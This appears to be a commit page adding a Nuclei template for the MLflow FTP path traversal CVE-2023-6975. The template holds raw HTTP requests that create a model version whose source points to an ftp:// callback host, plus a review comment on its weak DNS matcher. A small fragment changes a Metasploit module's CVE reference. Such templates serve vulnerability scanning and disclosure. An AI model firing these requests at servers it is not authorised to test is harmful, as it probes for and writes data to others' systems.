Merge pull request #9 from protectai/feb-exploit-release
Added mlflow URL parsing confusion Nuclei Template (CVE-2023-6975)
commit
655e78ff31
|
@ -0,0 +1,41 @@
|
|||
id: mlflow-url-parsing-confusion-lfi
|
||||
info:
|
||||
name: MLflow FTP Path Traversal
|
||||
author: kevin-mizu, byt3bl33d3r
|
||||
severity: high
|
||||
description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
|
||||
reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
||||
cvss-score: 9.3
|
||||
cve-id: CVE-2023-6975
|
||||
cwe-id: CWE-29
|
||||
tags: mlflow,ml,cve,path-traversal
|
||||
|
||||
variables:
|
||||
experiment_name: "{{rand_text_alpha(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "{{experiment_name}}"}
|
||||
- |
|
||||
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
|
||||
- |
|
||||
GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
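Review bot: The only matcher, `part: interactsh_protocol` with the word `dns`, fires on any name lookup of the callback host, so a hit shows that the server resolved the `ftp://` source, not that the traversal named in `description` took place; with a single matcher, `matchers-condition: and` also has no effect. I would state that limit in the template, for example `# DNS callback = host resolved the ftp:// source; confirm the MLflow version before reporting`, or pair the callback with a second matcher on the third response. The first two requests create a registered model and a model version on the scanned server and nothing removes them, which deserves a line in `description` so operators know the scan is not read-only. Separately, `severity: high` disagrees with `cvss-score: 9.3`, which falls in the critical band; `severity: critical` would match.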
@ -38,7 +38,7 @@ metadata = {
|
|||
'license': 'MSF_LICENSE',
|
||||
'references': [
|
||||
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
|
||||
{'type': 'cve', 'ref': 'CVE-2023-6025'}
|
||||
{'type': 'cve', 'ref': 'CVE-2023-31036'}
|
||||
],
|
||||
'type': 'remote_exploit_cmd_stager',
|
||||
'targets': [
|
||||
|
|